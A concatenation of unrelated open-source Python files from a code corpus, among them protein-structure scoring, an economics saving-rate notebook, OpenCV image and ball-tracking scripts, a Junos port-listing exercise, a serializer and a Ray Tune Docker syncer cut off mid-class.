src/get_gdt.py | yutake27/HMDM | 2 | 12759565 | import subprocess
import argparse
from pathlib import Path
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def parse_TMscore(result):
lines = result.split('\n')
for line in lines:
line_split = line.split()
if len(line_split) == 0:
continue
elif line_split[0] == 'TM-score':
tmscore = float(line_split[2])
elif line_split[0] == 'GDT-TS-score=':
gdtts = line_split[1]
elif line_split[0] == 'GDT-HA-score=':
gdtha = line_split[1]
return tmscore, gdtts, gdtha
def run_TMscore(native_pdb, model_pdb):
cmd = ['TMscore', model_pdb, native_pdb, '-outfmt', '-1']
result = subprocess.check_output(cmd)
return result.decode('utf-8')
def get_gdt(native_pdb, model_pdb):
result = run_TMscore(native_pdb, model_pdb)
tmscore, gdtts, gdtha = parse_TMscore(result)
return tmscore, gdtts, gdtha
def get_gdt_for_target(native_pdb_path, model_pdb_dir, blast_xml_csv_path, out_gdt_path):
model_array = []
tmscore_array = []
gdtts_array = []
gdtha_array = []
for model in model_pdb_dir.iterdir():
model_array.append(model.stem)
tmscore, gdtts, gdtha = get_gdt(native_pdb_path, model)
tmscore_array.append(tmscore)
gdtts_array.append(gdtts)
gdtha_array.append(gdtha)
df = pd.DataFrame({'TMscore': tmscore_array, 'GDT_TS': gdtts_array, 'GDT_HA': gdtha_array}, index=model_array)
df = df.astype('float')
df = df.sort_index()
df['target'] = [index.rsplit('_', 4)[0] for index in df.index]
df['template'] = [index.split('_', 2)[2].rsplit('_', 1)[0] for index in df.index]
df_template = pd.read_csv(blast_xml_csv_path, index_col=0)
df = pd.merge(df, df_template, left_on='template', right_index=True, how='left')
df.to_csv(out_gdt_path)
def get_gdt_for_target_df(native_pdb_path, model_pdb_dir, blast_xml_csv_path) -> pd.DataFrame:
model_array = []
tmscore_array = []
gdtts_array = []
gdtha_array = []
for model in model_pdb_dir.iterdir():
model_array.append(model.stem)
tmscore, gdtts, gdtha = get_gdt(native_pdb_path, model)
tmscore_array.append(tmscore)
gdtts_array.append(gdtts)
gdtha_array.append(gdtha)
df = pd.DataFrame({'TMscore': tmscore_array, 'GDT_TS': gdtts_array, 'GDT_HA': gdtha_array}, index=model_array)
df = df.astype('float')
df = df.sort_index()
df['target'] = [index.rsplit('_', 4)[0] for index in df.index]
df['template'] = [index.split('_', 2)[2].rsplit('_', 1)[0] for index in df.index]
df_template = pd.read_csv(blast_xml_csv_path, index_col=0)
df = pd.merge(df, df_template, left_on='template', right_index=True, how='left')
return df
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='target name')
parser.add_argument('--blastdb', '-b', type=str, help='blastdb name', default='pdbaa_20200712')
parser.add_argument('--dataset_name', '-d', type=str, help='name of the dataset', default='target_10')
args = parser.parse_args()
native_pdb = (Path('../native_pdb') / args.dataset_name / args.target).with_suffix('.pdb')
model_pdb_dir = Path('../pdb')/args.dataset_name/args.target
df_template_path = (Path('../blast_xml') / args.blastdb / args.dataset_name / args.target).with_suffix('.csv')
out_dir = Path('../tmscore') / args.dataset_name
out_dir.mkdir(parents=True, exist_ok=True)
out_path = (out_dir/args.target).with_suffix('.csv')
get_gdt_for_target(native_pdb, model_pdb_dir, df_template_path, out_path)
| 2.28125 | 2 |
notebooks/Uncertainty-and-the-Saving-Rate.py | JackShiqiLi/DemARK | 0 | 12759566 | <filename>notebooks/Uncertainty-and-the-Saving-Rate.py<gh_stars>0
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.2'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# # Uncertainty and Saving in Partial Equilibrium
#
# [](https://mybinder.org/v2/gh/econ-ark/DemARK/master?filepath=notebooks%2FUncertainty-and-the-Saving-Rate.ipynb)
#
# Saving rates vary widely across countries, but there is no consensus about the main causes of those differences.
#
# One commonly mentioned factor is differences across countries in the degree of uncertainty that individuals face, which should induce different amounts of precautionary saving.
#
# Uncertainty might differ for "fundamental" reasons, having to do with, say, the volatility of demand for the goods and services supplied by the country, or might differ as a result of economic policies, such as the strucutre of the social insurance system.
#
# A challenge in evaluating the importance of precautionary motives for cross-country saving differences has been a lack of consensus about what measures of uncertainty ought, in principle, to be the right ones to look at in any attempt to measure a relationship between uncertainty and saving.
#
# This notebook uses [a standard model](https://econ.jhu.edu/people/ccarroll/papers/cstwMPC) <cite data-cite="6202365/7MR8GUVS"></cite> to construct a theoretical benchmark for the relationship of saving to two kinds of uncertainty: Permanent shocks and transitory shocks to income.
#
# Conclusions:
# 1. The model implies a close to linear relationship between the variance of either kind of shock (transitory or permanent) and the saving rate
# 2. The _slope_ of that relationship is much steeper for permanent than for transitory shocks
# * Over ranges of values calibrated to be representative of microeconomically plausible magnitudes
#
# Thus, the quantitative theory of precautionary saving says that the principal determinant of precautionary saving should be the magnitude of permanent (or highly persistent) shocks to income.
#
# (Because the result was obtained in a partial equilibrium model, the conclusion applies also to attempts to measure the magnitude of precautionary saving across groups of people who face different degrees of uncertainty within a country).
#
# @authors: <NAME>, <NAME>, <NAME>
# %% {"code_folding": [0, 11]}
# Boring non-HARK setup stuff
Generator = True # This notebook can be used as a source for generating derivative notebooks
nb_name = 'Uncertainty-and-the-Saving-Rate'
# This is a jupytext paired notebook that autogenerates BufferStockTheory.py
# which can be executed from a terminal command line via "ipython BufferStockTheory.py"
# But a terminal does not permit inline figures, so we need to test jupyter vs terminal
# Google "how can I check if code is executed in the ipython notebook"
from IPython import get_ipython # In case it was run from python instead of ipython
def in_ipynb():
try:
if str(type(get_ipython())) == "<class 'ipykernel.zmqshell.ZMQInteractiveShell'>":
return True
else:
return False
except NameError:
return False
# Determine whether to make the figures inline (for spyder or jupyter)
# vs whatever is the automatic setting that will apply if run from the terminal
if in_ipynb():
# %matplotlib inline generates a syntax error when run from the shell
# so do this instead
get_ipython().run_line_magic('matplotlib', 'inline')
else:
get_ipython().run_line_magic('matplotlib', 'auto')
print('You appear to be running from a terminal')
print('By default, figures will appear one by one')
print('Close the visible figure in order to see the next one')
# Import the plot-figure library matplotlib
import matplotlib.pyplot as plt
# In order to use LaTeX to manage all text layout in our figures, we import rc settings from matplotlib.
from matplotlib import rc
plt.rc('font', family='serif')
# LaTeX is huge and takes forever to install on mybinder
# so if it is not installed then do not use it
from distutils.spawn import find_executable
iflatexExists=False
if find_executable('latex'):
iflatexExists=True
plt.rc('font', family='serif')
plt.rc('text', usetex=iflatexExists)
# The warnings package allows us to ignore some harmless but alarming warning messages
import warnings
warnings.filterwarnings("ignore")
# The tools for navigating the filesystem
import sys
import os
sys.path.insert(0, os.path.abspath('../lib')) # directory is one down from root
from copy import copy, deepcopy
# Define (and create, if necessary) the figures directory "Figures"
if Generator:
nb_file_path = os.path.dirname(os.path.abspath(nb_name+".ipynb")) # Find pathname to this file:
FigDir = os.path.join(nb_file_path,"Figures/") # LaTeX document assumes figures will be here
# FigDir = os.path.join(nb_file_path,"/tmp/Figures/") # Uncomment to make figures outside of git path
if not os.path.exists(FigDir):
os.makedirs(FigDir)
from copy import deepcopy
from scipy.optimize import golden, brentq
from time import clock
import numpy as np
import scipy as sp
# %% {"code_folding": [0]}
# Import HARK tools and cstwMPC parameter values
from HARK.utilities import plotFuncsDer, plotFuncs
from HARK.ConsumptionSaving.ConsIndShockModel import PerfForesightConsumerType
import HARK.cstwMPC.cstwMPC as cstwMPC
import HARK.cstwMPC.SetupParamsCSTW as Params
# Double the default value of variance
# Params.init_infinite['PermShkStd'] = [i*2 for i in Params.init_infinite['PermShkStd']]
# %% {"code_folding": [0]}
# Setup stuff for general equilibrium version
# Set targets for K/Y and the Lorenz curve
lorenz_target = cstwMPC.getLorenzShares(Params.SCF_wealth,weights=
Params.SCF_weights,percentiles=
Params.percentiles_to_match)
lorenz_long_data = np.hstack((np.array(0.0),\
cstwMPC.getLorenzShares(Params.SCF_wealth,weights=\
Params.SCF_weights,percentiles=\
np.arange(0.01,1.0,0.01).tolist()),np.array(1.0)))
KY_target = 10.26
# %% {"code_folding": [0]}
# Setup and calibration of the agent types
# The parameter values below are taken from
# http://econ.jhu.edu/people/ccarroll/papers/cjSOE/#calibration
Params.init_cjSOE = Params.init_infinite # Get default values of all parameters
# Now change some of the parameters for the individual's problem to those of cjSOE
Params.init_cjSOE['CRRA'] = 2
Params.init_cjSOE['Rfree'] = 1.04**0.25
Params.init_cjSOE['PermGroFac'] = [1.01**0.25] # Indiviual-specific income growth (from experience, e.g.)
Params.init_cjSOE['PermGroFacAgg'] = 1.04**0.25 # Aggregate productivity growth
Params.init_cjSOE['LivPrb'] = [0.95**0.25] # Matches a short working life
PopGroFac_cjSOE = [1.01**0.25] # Irrelevant to the individual's choice; attach later to "market" economy object
# Instantiate the baseline agent type with the parameters defined above
BaselineType = cstwMPC.cstwMPCagent(**Params.init_cjSOE)
BaselineType.AgeDstn = np.array(1.0) # Fix the age distribution of agents
# Make desired number of agent types (to capture ex-ante heterogeneity)
EstimationAgentList = []
for n in range(Params.pref_type_count):
EstimationAgentList.append(deepcopy(BaselineType))
EstimationAgentList[n].seed = n # Give every instance a different seed
# %% {"code_folding": [0]}
# Make an economy for the consumers to live in
EstimationEconomy = cstwMPC.cstwMPCmarket(**Params.init_market)
EstimationEconomy.print_parallel_error_once = True # Avoids a bug in the code
EstimationEconomy.agents = EstimationAgentList
EstimationEconomy.act_T = Params.T_sim_PY # How many periods of history are good enough for "steady state"
# %% {"code_folding": [0]}
# Uninteresting parameters that also need to be set
EstimationEconomy.KYratioTarget = KY_target
EstimationEconomy.LorenzTarget = lorenz_target
EstimationEconomy.LorenzData = lorenz_long_data
EstimationEconomy.PopGroFac = PopGroFac_cjSOE # Population growth characterizes the entire economy
EstimationEconomy.ignore_periods = Params.ignore_periods_PY # Presample periods
#Display statistics about the estimated model (or not)
EstimationEconomy.LorenzBool = False
EstimationEconomy.ManyStatsBool = False
EstimationEconomy.TypeWeight = [1.0]
# %% {"code_folding": [0]}
# construct spread_estimate and center_estimate if true, otherwise use the default values
Params.do_param_dist=True # Whether to use a distribution of ex-ante heterogeneity
# Discount factors assumed to be uniformly distributed around center_pre for spread_pre on either side
spread_pre=0.0019501105739768 #result under the default calibration of cjSOE
center_pre=1.0065863855906343 #result under the default calibration of cjSOE
do_optimizing=False # Set to True to reestimate the distribution of time preference rates
if do_optimizing: # If you want to rerun the cstwMPC estimation, change do_optimizing to True
# Finite value requires discount factor from combined pure and mortality-induced
# discounting to be less than one, so maximum DiscFac is 1/LivPrb
DiscFacMax = 1/Params.init_cjSOE['LivPrb'][0] #
param_range = [0.995,-0.0001+DiscFacMax]
spread_range = [0.00195,0.0205] #
if Params.do_param_dist: # If configured to estimate the distribution
LorenzBool = True
# Run the param-dist estimation
paramDistObjective = lambda spread : cstwMPC.findLorenzDistanceAtTargetKY(
Economy = EstimationEconomy,
param_name = Params.param_name,
param_count = Params.pref_type_count,
center_range = param_range,
spread = spread,
dist_type = Params.dist_type) # Distribution of DiscFac
t_start = clock()
spread_estimate = golden(paramDistObjective
,brack=spread_range
,tol=1e-4)
center_estimate = EstimationEconomy.center_save
t_end = clock()
else: # Run the param-point estimation only
paramPointObjective = lambda center : cstwMPC.getKYratioDifference(Economy = EstimationEconomy,
param_name = Params.param_name,
param_count = Params.pref_type_count,
center = center,
spread = 0.0,
dist_type = Params.dist_type)
t_start = clock()
center_estimate = brentq(paramPointObjective # Find best point estimate
,param_range[0]
,param_range[1],xtol=1e-6)
spread_estimate = 0.0
t_end = clock()
print(spread_estimate)
print('****************')
print(center_estimate)
print('****************')
else: # Just use the hard-wired numbers from cstwMPC
center_estimate=center_pre
spread_estimate=spread_pre
# %% {"code_folding": [0]}
# Construct the economy at date 0
EstimationEconomy.distributeParams( # Construct consumer types whose heterogeneity is in the given parameter
'DiscFac',
Params.pref_type_count,# How many different types of consumer are there
center_estimate, # Increase patience slightly vs cstwMPC so that maximum saving rate is higher
spread_estimate, # How much difference is there across consumers
Params.dist_type) # Default is for a uniform distribution
# %% {"code_folding": [0]}
# Function to calculate the saving rate of a cstw economy
def calcSavRte(Economy,ParamToChange,NewVals):
'''
Calculates the saving rate as income minus consumption divided by income.
Parameters
----------
Economy : [cstwMPCmarket]
A fully-parameterized instance of a cstwMPCmarket economy
ParamToChange : string
Name of the parameter that should be varied from the original value in Economy
NewVals : [float] or [list]
The alternative value (or list of values) that the parameter should take
Returns
-------
savRte : [float]
The aggregate saving rate in the last year of the generated history
'''
for NewVal in NewVals:
if ParamToChange in ["PermShkStd","TranShkStd"]:
ThisVal = [NewVal]
else:
ThisVal = NewVal # If they asked to change something else, assume it's a scalar
for j in range(len(Economy.agents)): # For each agent, set the new parameter value
setattr(Economy.agents[j],ParamToChange,ThisVal)
cstwMPC.cstwMPCagent.updateIncomeProcess(Economy.agents[j])
Economy.solve()
C_NrmNow=[]
A_NrmNow=[]
M_NrmNow=[]
for j in range (len(Economy.agents)): # Combine the results across all the agents
C_NrmNow=np.hstack((C_NrmNow,Economy.agents[j].cNrmNow))
A_NrmNow=np.hstack((A_NrmNow,Economy.agents[j].aNrmNow))
M_NrmNow=np.hstack((M_NrmNow,Economy.agents[j].mNrmNow))
CAgg=np.sum(np.hstack(Economy.pLvlNow)*C_NrmNow) # cNrm times pLvl = level of c; sum these for CAgg
AAgg=np.sum(np.hstack(Economy.pLvlNow)*A_NrmNow) # Aggregate Assets
MAgg=np.sum(np.hstack(Economy.pLvlNow)*M_NrmNow) # Aggregate Market Resources
YAgg=np.sum(np.hstack(Economy.pLvlNow)*np.hstack(Economy.TranShkNow)) # Aggregate Labor Income
BAgg=MAgg-YAgg # Aggregate "Bank Balances" (at beginning of period; before consumption decision)
IncAgg=(BaselineType.Rfree-1)*BAgg+YAgg # Interest income plus noninterest income
savRte=(IncAgg-CAgg)/IncAgg # Unspent income divided by the level of income
return savRte
# %% {"code_folding": [0]}
# Function to plot relationship between x and y; x is the parameter varied and y is saving rate
def plotReg(x,y,xMin,xMax,yMin,yMax,xLbl,yLbl,Title,fileName):
# Result_data_path = os.path.join(Folder_path,'SavingVSPermShr_Youth_MPC_15.png')
plt.ylabel(yLbl)
plt.xlabel(xLbl)
plt.title(Title)
plt.xlim(xMin,xMax)
plt.ylim(yMin,yMax)
plt.scatter(x,y)
# Draw the linear fitted line
m, b = np.polyfit(x, y, 1)
# plt.plot(x, m*np.asarray(x) + b, '-')
if Generator:
plt.savefig(FigDir + nb_name + '-' + fileName + '.png')
plt.savefig(FigDir + nb_name + '-' + fileName + '.svg')
plt.savefig(FigDir + nb_name + '-' + fileName + '.pdf')
slope, intercept, r_value, p_value, std_err = sp.stats.linregress(x,y)
print('Slope=' + str(slope) + ', intercept=' + str(intercept) + ', r_value=' + str(r_value) + ', p_value=' + str(p_value)+', std=' + str(std_err))
# %% {"code_folding": [0]}
# Proportion of base value for uncertainty parameter to take (up to 1 = 100 percent)
# Do not go above one to avoid having to worry about whether the most patient consumer violates the
# Growth Impatience Condition (https://econ.jhu.edu/people/ccarroll/papers/BufferStockTheory/#GIC)
bottom=0.5
points=np.arange(bottom,1.+0.025,0.025)
# %% {"code_folding": [0]}
# Calculate variance of permanent shock vs saving measures
savRteList = []
KtoYList = []
pVarList = []
pVarBase = BaselineType.PermShkStd[0] ** 2
for pVar in points * pVarBase:
pVarList.append(pVar) # Variance is square of standard deviation
pStd = pVar ** 0.5
# print(pStd)
savRteList.append(calcSavRte(EstimationEconomy,"PermShkStd",[pStd]))
KtoYList.append(0.25*np.mean(np.array(EstimationEconomy.KtoYnow_hist)[EstimationEconomy.ignore_periods:]))
# %% {"code_folding": [0]}
# Calculate how much net worth shrinks when permanent variance is halved
ShrinksBy = KtoYList[1]/KtoYList[-1]
print('Halving the magnitude of the permanent variance causes target wealth to fall to %1.3f' % ShrinksBy)
print('of its original value.')
# %% {"code_folding": [0]}
# Plot pVar vs saving measures
plotReg(pVarList,savRteList,
xMin=pVarList[1]-0.0002,xMax=pVarList[-1]+0.0002,yMin=savRteList[1]-0.01,yMax=savRteList[-1]+0.01,
xLbl=r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$',
yLbl='Aggregate Saving Rate',
Title='Uncertainty vs Saving',
fileName='savRtevsPermShkVar'
)
plt.show(block=False)
plotReg(pVarList,KtoYList,
xMin=pVarList[1]-0.0002,xMax=pVarList[-1]+0.0002,yMin=1.7,yMax=KtoYList[-1]+0.1,
xLbl=r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$',
yLbl='Net Worth/Income',
Title='Uncertainty vs Net Worth Ratio',
fileName='BvsPermShkVar'
)
plt.ylabel('Net Worth/Income')
plt.xlabel(r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$')
plt.title('Uncertainty vs Net Worth Ratio',fontsize=16)
plt.xlim(pVarList[1]-0.0002,pVarList[-1]+0.0002)
plt.ylim(1.6,KtoYList[-1]+0.1)
plt.scatter(pVarList,KtoYList)
plt.xticks([pVarList[1],pVarList[-1]],[r'$\bar{\sigma}^{2}_{\psi}/2$',r'$\bar{\sigma}^{2}_{\psi}$'])
fileName='BvsPermShkVar'
if Generator:
plt.savefig(FigDir + nb_name + '-' + fileName + '.png')
plt.savefig(FigDir + nb_name + '-' + fileName + '.svg')
plt.savefig(FigDir + nb_name + '-' + fileName + '.pdf')
plt.show(block=False)
# %% {"code_folding": [0]}
# Calculate variance of transitory shock vs saving measures
# Restore benchmark solution
EstimationEconomy.distributeParams( # Construct consumer types whose heterogeneity is in the given parameter
'DiscFac',
Params.pref_type_count,# How many different types of consumer are there
center_estimate, # Increase patience slightly vs cstwMPC so that maximum saving rate is higher
spread_estimate, # How much difference is there across consumers
Params.dist_type) # Default is for a uniform distribution
EstimationEconomy.solve()
savRteList_Tran = []
KtoYList_Tran = []
tVarList = []
tVarBase = BaselineType.TranShkStd[0] ** 2
for tVar in points * tVarBase:
tVarList.append(tVar) # Variance is std squared
savRteList_Tran.append(calcSavRte(EstimationEconomy,"TranShkStd",[tVar ** 0.5]))
KtoYList_Tran.append(0.25*np.mean(np.array(EstimationEconomy.KtoYnow_hist)[EstimationEconomy.ignore_periods:]))
# %% {"code_folding": [0]}
# Plot transitory variance versus saving measures
plotReg(tVarList,savRteList_Tran,
xMin=tVarList[1]-0.001,xMax=tVarList[-1]+0.001,yMin=savRteList[1]-0.01,yMax=savRteList[-1]+0.01,
xLbl=r'Variance of Transitory Shocks, $\sigma^{2}_{\theta}$',
yLbl='Aggregate Saving Rate',
Title='Uncertainty vs Saving',
fileName='savRteVSTranShkVar'
)
plt.show(block=False)
plotReg(tVarList,KtoYList_Tran,
xMin=tVarList[1]-0.001,xMax=tVarList[-1]+0.001,yMin=savRteList[1]-0.01,yMax=KtoYList[-1]+0.1,
xLbl=r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$',
yLbl='Net Worth/Income',
Title='Uncertainty vs Net Worth Ratio',
fileName='BvsTranShkVar'
)
plt.show(block=False)
| 3.03125 | 3 |
Image_to_Sketch/Pencil sketch.py | theAdarshSrivastava/OpenCv | 1 | 12759567 | import cv2
def img2sketch(photo, k_size):
#Read Image
img=cv2.imread(photo)
# Convert to Grey Image
grey_img=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Invert Image
invert_img=cv2.bitwise_not(grey_img)
#invert_img=255-grey_img
# Blur image
blur_img=cv2.GaussianBlur(invert_img, (k_size,k_size),0)
# Invert Blurred Image
invblur_img=cv2.bitwise_not(blur_img)
#invblur_img=255-blur_img
# Sketch Image
sketch_img=cv2.divide(grey_img,invblur_img, scale=256.0)
# Save Sketch
cv2.imwrite('sketch.jpg', sketch_img)
# Display sketch
cv2.imshow('sketch image',sketch_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
#Function call
img2sketch(photo='d.jpg', k_size=111) | 3.171875 | 3 |
virtual/lib/python3.8/site-packages/setuptools/_itertools.py | Jamesmwangi245/flask-3 | 4 | 12759568 | from setuptools.extern.more_itertools import consume # noqa: F401
# copied from jaraco.itertools 6.1
def ensure_unique(iterable, key=lambda x: x):
"""
Wrap an iterable to raise a ValueError if non-unique values are encountered.
>>> list(ensure_unique('abc'))
['a', 'b', 'c']
>>> consume(ensure_unique('abca'))
Traceback (most recent call last):
...
ValueError: Duplicate element 'a' encountered.
"""
seen = set()
seen_add = seen.add
for element in iterable:
k = key(element)
if k in seen:
raise ValueError(f"Duplicate element {element!r} encountered.")
seen_add(k)
yield element
| 2.90625 | 3 |
process_video.py | ckjellson/tt_tracker | 15 | 12759569 | <filename>process_video.py
import cv2
cv2.setUseOptimized(True)
import numpy as np
import time
'''
Functions for ball detection in each frame of a video
'''
test = False # Used to test functions for improvement
fgbg = cv2.createBackgroundSubtractorMOG2(history=15,varThreshold=50, detectShadows=False)
kernel = np.ones((2,2),np.uint8)
# Setup SimpleBlobDetector parameters.
params = cv2.SimpleBlobDetector_Params()
# Change thresholds
params.minThreshold = 50
# Filter by Color.
params.filterByColor = True
params.blobColor = 255
# Filter by Area.
params.filterByArea = True
params.minArea = 30
# Filter by Circularity
params.filterByCircularity = True
params.minCircularity = 0.75
# Filter by Convexity
params.filterByConvexity = True
params.minConvexity = 0.9
# Filter by Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.08
# Create a detector with the parameters
detector = cv2.SimpleBlobDetector_create(params)
def read_video(path,flipped):
'''
Main function
Args:
path (str): path to video
flipped (bool): true if a video is read in upside-down
Returns:
height (int): height of video frames
width (int): width of video frames
ball_pos (np.array): detected positions of balls in each frame
fps (int): frames per second
'''
cap = cv2.VideoCapture(path)
nbr_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
height, width, ball_pos = track_ball(cap, nbr_frames,flipped)
cap.release()
cv2.destroyAllWindows()
for i in range(ball_pos.shape[0]):
ball_pos[i, 1] = height - ball_pos[i, 1]-1
return height, width, ball_pos, fps
# Creates trace of ball in image
def track_ball(cap,nbr_frames,flipped):
'''
:param cap: Video object
:param nbr_frames: Number of frames
:param flipped: true if video flipped
:return: video height,width and detected ball positions
'''
ball_pos = np.ones([nbr_frames,3])
height = 0
width = 0
# Iterate through frames
for i in range(nbr_frames):
ret, frame = cap.read()
if flipped:
frame = cv2.flip(frame,0)
frame = cv2.flip(frame,1)
if i==0:
height,width,channels = frame.shape
if ret:
if width>1280:
frame = cv2.resize(frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)), interpolation=cv2.INTER_AREA)
ball_pos[i,0:2] = find_ball(frame, height, width)*2
else:
ball_pos[i, 0:2] = find_ball(frame, height, width)
if i%100==0:
print(str(i) + ' / ' + str(nbr_frames))
return height, width, ball_pos
# Finds ball position in orig
def find_ball(frame,height,width):
'''
:param frame:
:param height:
:param width:
:return: pos: 2D position of detected ball ([0,0] if none detected)
'''
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
# t1 = time.time()
gray[cv2.medianBlur(fgbg.apply(frame),ksize=5)==0] = 0
# t2 = time.time()
keypoints = detector.detect(gray)
# t3 = time.time()
# print('fgbg:'+str(t2-t1))
# print('detector:'+str(t3-t2))
if test:
im_with_keypoints = cv2.drawKeypoints(gray, keypoints, np.array([]), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
cv2.imshow('', im_with_keypoints)
cv2.waitKey()
col = 0
row = 0
if len(keypoints)>0:
maxval = 0
for i in range(len(keypoints)):
x = int(keypoints[i].pt[0])
y = int(keypoints[i].pt[1])
val = np.sum(gray[max([y-3,0]):min([y+3,height-1]),max([x-3,0]):min([x+3,width-1])])
if val>maxval:
col = x
row = y
maxval = val
pos = np.array([col, row])
if test:
framecopy = np.copy(frame)
cv2.circle(framecopy, (col, row), 10, color=(0,255,0), thickness=4)
cv2.imshow('gray', framecopy)
cv2.waitKey()
return pos
if test:
vidpath = 'videos/outside2.mp4'
flipped = False
height,width,ballpos,fps = read_video(vidpath,flipped) | 3 | 3 |
pythonFiles/tests/testing_tools/adapter/.data/complex/mod.py | AlbertDeFusco/vscode-python | 2,461 | 12759570 | <reponame>AlbertDeFusco/vscode-python
"""
Examples:
>>> square(1)
1
>>> square(2)
4
>>> square(3)
9
>>> spam = Spam()
>>> spam.eggs()
42
"""
def square(x):
"""
Examples:
>>> square(1)
1
>>> square(2)
4
>>> square(3)
9
"""
return x * x
class Spam(object):
"""
Examples:
>>> spam = Spam()
>>> spam.eggs()
42
"""
def eggs(self):
"""
Examples:
>>> spam = Spam()
>>> spam.eggs()
42
"""
return 42
| 3.15625 | 3 |
class10/exercise2.py | gleydsonm/pynet_ex | 0 | 12759571 | <gh_stars>0
#!/usr/bin/env python
'''
Exercise 2 - class 10
'''
from jnpr.junos import Device
from jnpr.junos import exception
from jnpr.junos.op.ethport import EthPortTable
from getpass import getpass
import sys
HOST = '172.16.31.10'
USER = 'pyclass'
PWD = getpass()
def remote_conn(hst, usr, pwd):
'''
Open the remote connection to the device
'''
try:
dev = Device(host=hst, user=usr, password=pwd)
o_dev = dev.open()
except exception.ConnectAuthError:
print 'Incorrect username or password'
return False
return o_dev
def main():
'''
Main function
'''
a_device = remote_conn(HOST, USER, PWD)
if not a_device:
sys.exit('Fix the above errors. Exiting...')
ports = EthPortTable(a_device)
ports.get()
for port in ports.keys():
print port
port_items = dict(ports[port].items())
print ' Oper: %s' % (port_items['oper'])
print ' rx: %s' % (port_items['rx_packets'])
print ' tx: %s' % (port_items['tx_packets'])
print
if __name__ == '__main__':
main()
| 2.78125 | 3 |
6_kombinationen/loopRandom/StarrySky.py | Coding-for-the-Arts/drawbot-samples | 0 | 12759572 | <gh_stars>0
"""
Random St<NAME>
"""
newPage(300, 300)
fill(0)
rect(0, 0, 300, 300)
for i in range (200):
dia = random() * 3
fill(random())
oval(random()*300, random()*300, dia, dia)
"""
Aufgabe:
- Platziere ein paar zufällig farbige Planeten am Nachthimmel
- Was passiert, wenn du Zeile 13 zu oval(dia, dia, dia, dia) änderst?
- Warum braucht es für die x- und y-Position seperate Zufallswerte?
"""
| 3.09375 | 3 |
biothings/utils/serializer.py | newgene/biothings.api | 0 | 12759573 | <gh_stars>0
import datetime
from collections import OrderedDict, UserString, UserDict, UserList
from urllib.parse import parse_qs, unquote_plus, urlencode, urlparse, urlunparse
import orjson
import yaml
def to_json_0(data):
'''deprecated'''
import json
from biothings.utils.common import BiothingsJSONEncoder
return json.dumps(data, cls=BiothingsJSONEncoder)
def orjson_default(o):
'''The default function passed to orjson to serialize non-serializable objects'''
if isinstance(o, (UserDict, UserList)):
return o.data # o.data is the actual dictionary of list to store the data
raise TypeError(f"Type {type(o)} not serializable")
def to_json(data, indent=False, sort_keys=False):
# default option:
# OPT_NON_STR_KEYS: non string dictionary key, e.g. integer
# OPT_NAIVE_UTC: use UTC as the timezone when it's missing
option = orjson.OPT_NON_STR_KEYS | orjson.OPT_NAIVE_UTC
if indent:
option |= orjson.OPT_INDENT_2
if sort_keys:
option |= orjson.OPT_SORT_KEYS
return orjson.dumps(data, default=orjson_default, option=option).decode()
def to_yaml(data, stream=None, Dumper=yaml.SafeDumper, default_flow_style=False):
# Author: <NAME>
class OrderedDumper(Dumper):
pass
def _dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
data.items())
OrderedDumper.add_representer(OrderedDict, _dict_representer)
return yaml.dump(data, stream, OrderedDumper, default_flow_style=default_flow_style)
def to_msgpack(data):
import msgpack
return msgpack.packb(data, use_bin_type=True, default=_msgpack_encode_datetime)
def _msgpack_encode_datetime(obj):
if isinstance(obj, datetime.datetime):
return {
'__datetime__': True,
'as_str': obj.strftime("%Y%m%dT%H:%M:%S.%f")
}
return obj
class URL(UserString):
def remove(self, param='format'):
urlparsed = urlparse(str(self))
qs = parse_qs(urlparsed.query)
qs.pop(param, None)
qs = urlencode(qs, True)
urlparsed = urlparsed._replace(query=qs)
url = urlunparse(urlparsed)
return unquote_plus(url)
| 2.28125 | 2 |
python/ray/tune/integration/docker.py | mkucijan/ray | 21,382 | 12759574 | <filename>python/ray/tune/integration/docker.py<gh_stars>1000+
import logging
import os
from typing import Optional, Tuple, List
from ray.autoscaler.sdk import rsync, configure_logging
from ray.util import get_node_ip_address
from ray.util.debug import log_once
from ray.tune.syncer import NodeSyncer
from ray.tune.sync_client import SyncClient
from ray.ray_constants import env_integer
logger = logging.getLogger(__name__)
class DockerSyncer(NodeSyncer):
"""DockerSyncer used for synchronization between Docker containers.
This syncer extends the node syncer, but is usually instantiated
without a custom sync client. The sync client defaults to
``DockerSyncClient`` instead.
Set the env var `TUNE_SYNCER_VERBOSITY` to increase verbosity
of syncing operations (0, 1, 2, 3). Defaults to 0.
.. note::
This syncer only works with the Ray cluster launcher.
If you use your own Docker setup, make sure the nodes can connect
to each other via SSH, and try the regular SSH-based syncer instead.
Example:
.. code-block:: python
from ray.tune.integration.docker import DockerSyncer
tune.run(train,
sync_config=tune.SyncConfig(
sync_to_driver=DockerSyncer))
"""
_cluster_config_file = os.path.expanduser("~/ray_bootstrap_config.yaml")
def __init__(self,
local_dir: str,
remote_dir: str,
sync_client: Optional[SyncClient] = None):
configure_logging(
log_style="record",
verbosity=env_integer("TUNE_SYNCER_VERBOSITY", 0))
self.local_ip = get_node_ip_address()
self.worker_ip = None
sync_client = sync_client or DockerSyncClient()
sync_client.configure(self._cluster_config_file)
super(NodeSyncer, self).__init__(local_dir, remote_dir, sync_client)
def set_worker_ip(self, worker_ip: str):
self.worker_ip = worker_ip
@property
def _remote_path(self) -> Tuple[str, str]:
return (self.worker_ip, self._remote_dir)
class DockerSyncClient(SyncClient):
